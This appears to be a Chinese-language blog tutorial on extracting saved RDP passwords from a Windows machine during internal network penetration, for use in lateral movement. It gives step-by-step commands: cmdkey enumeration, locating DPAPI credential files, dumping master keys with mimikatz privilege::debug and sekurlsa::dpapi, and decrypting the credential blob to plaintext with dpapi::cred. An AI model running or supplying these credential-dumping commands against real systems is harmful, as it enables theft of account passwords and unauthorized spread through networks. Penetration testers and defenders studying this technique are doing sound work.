内网渗透:利用mimikatz查看rdp/3389连接密码

在做内网渗透的时候,往往有的时候如果能得到远程的rdp连接密码,做起横向渗透或者纵向渗透更加容易拿到shell.rdp的密码为什么会被保存起来呢?是因为管理员的在连接的时候对信息凭据进行保存,所以会保存到本地的计算机当中,从而我们可以使用minikatz来进行读取密码的信息.

  1. 首先使用cmdkey /list来查看是否有保存的凭据密码信息.

在这里插入图片描述
2.使用命令:dir /a %userprofile%\AppData\Local\Microsoft\Credentials* 来查看保存凭据的目录和凭据的值.
在这里插入图片描述
在这里我们需要记住两个重点的信息,在稍后我们是需要使用到的.
C:\Users\earnm\AppData\Local\Microsoft\Credentials 的目录
5117847B0601B531BECD17B088FAC578 凭据的值
3.使用mimikatz来进行操作读取密码
dpapi::cred /in:C:\Users\earnm\AppData\Local\Microsoft\Credentials\5117847B0601B531BECD17B088FAC578
在这里插入图片描述
在这里我们需要记住guidmasterkey的值,稍后我们需要找到对于的东西
{b5b52126-ff2b-4deb-9e7c-d65bd6b6593e}

3.1 使用这条命令进行把数据保存到c盘的根目录中:mimikatz.exe ““privilege::debug”” ““sekurlsa::dpapi full”” exit >> c:\log.txt

然后我们在txt文件中找到对应的{b5b52126-ff2b-4deb-9e7c-d65bd6b6593e}的值.
MasterKey : c957dc8f2ee8085b05cd42171e2ced901a5755f54249e6de47948db5e7f7858857875f7774b1ac7f1feb42bc73a9eaeebf627b34d31386ef3fbd3563ad2fa202
在这里插入图片描述
在这里插入图片描述

3.2使用下面的命令进行读取密码的信息
这里使用刚才的目录,加上刚才的值MasterKey就可以进行读取了密码.
mimikatz # dpapi::cred /in:C:\Users\earnm\AppData\Local\Microsoft\Credentials\5117847B0601B531BECD17B088FAC578 /masterkey:c957dc8f2ee8085b05cd42171e2ced901a5755f54249e6de47948db5e7f7858857875f7774b1ac7f1feb42bc73a9eaeebf627b34d31386ef3fbd3563ad2fa202
在这里插入图片描述
在这里插入图片描述
这里的username就是账户,credentialblob就是账号密码.

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值